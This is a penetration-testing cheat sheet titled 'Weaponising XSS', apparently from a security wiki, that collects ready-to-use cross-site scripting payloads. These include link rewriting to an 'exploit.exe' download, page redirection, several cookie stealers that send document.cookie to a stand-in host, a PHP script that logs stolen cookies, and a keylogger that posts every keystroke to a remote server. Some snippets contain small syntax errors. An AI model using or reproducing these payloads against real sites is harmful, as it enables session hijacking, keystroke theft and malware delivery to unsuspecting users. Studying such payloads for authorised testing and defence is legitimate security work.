Weaponising XSS

1-up your <script>alert(1)</script> and effectively demonstrate risk

Content substitution

Replace Link

Replace all links on the page with your link

for (var i = 0; i < document.links.length; i++) {
  var a = document.links[i];
  a.href = 'https://domain.com/exploit.exe';
}

Replace HTML element

Replace HTML elements wwith your custom content using Element.innerHTML function. Example below replaces entire body element.

document.body.innerHTML = 'New body HTML';

Forward traffic

Simply forward traffic to your own site

location.replace("https://domain.com")
Example use in "input" field
onfocus=location.replace("https://domain.com") autofocus=a

Data Exfiltration

document.location cookie stealer

<script type="text/javascript">
document.location='https://domain.com/cookiestealer.php?c='+document.cookie;
</script>

img src cookie stealer

<script type="text/javascript">
<img src=x onerror=this.src='https://domain.com/?c='+document.cookie>
</script>

PHP Server to cache cookies

<?php
header ('Location: https://redirect-domain.com');
    $cookies = $_GET["c"];
    $file = fopen('cookielog.txt, 'a');
    fwrite($file, $cookies . "\n\n\n");
?>

Multiple methods have been included below for exfiltration, choose only one

function ajaxRequest (method, url, data, ad) {
  var xmlHttp = new XMLHttpRequest()

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType('text/plain; charset=x-user-defined')
  }

  xmlHttp.open(method, url, true)

  if (ad) {
    xmlHttp.onreadystatechange = function () {
      if (xmlHttp.readyState === 4) {
        ad(xmlHttp)
      }
    }
  }

  xmlHttp.send(data)
  return xmlHttp
}

var CookieExfil = function () {}
var c = document.cookie
//Include one of the three exfil methods below:
//GET request - AJAX
var i = new Image()
ajaxRequest('GET', 'https://domain.com?c=' + encodeURIComponent(c), undefined, CookieExfil)

//GET request DOM
var i = new Image()
i.src = 'https://domain.com?c=' + encodeURIComponent(c)
CookieExfil()

//POST request - AJAX
ajaxRequest('POST', 'https://domain.com', 'cookie=' + encodeURIComponent(c), CookieExfil)

Key logger

Log keystrokes made to attackers remote server

function ajaxRequest (method, url, data, ad) {
  var xmlHttp = new XMLHttpRequest()

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType('text/plain; charset=x-user-defined')
  }

  xmlHttp.open(method, url, true)

  if (ad) {
    xmlHttp.onreadystatechange = function () {
      if (xmlHttp.readyState === 4) {
        ad(xmlHttp)
      }
    }
  }

  xmlHttp.send(data)
  return xmlHttp
}

document.addEventListener('keypress', function (e) {
  ajaxRequest('POST', 'https://domain.com/Log', 'key=' + e.key)
})

PreviousXSS - Cross site scripting NextOther

Last updated 5 years ago

Was this helpful?

hashtagContent substitution

hashtagReplace Link

hashtagReplace HTML element

hashtagForward traffic

hashtagData Exfiltration

hashtagCookie stealers

hashtagSimple cookie stealers

hashtagPHP Server to cache cookies

hashtagJavascript cookie stealer (could be paired with keylogger below)

hashtagKey logger

hashtag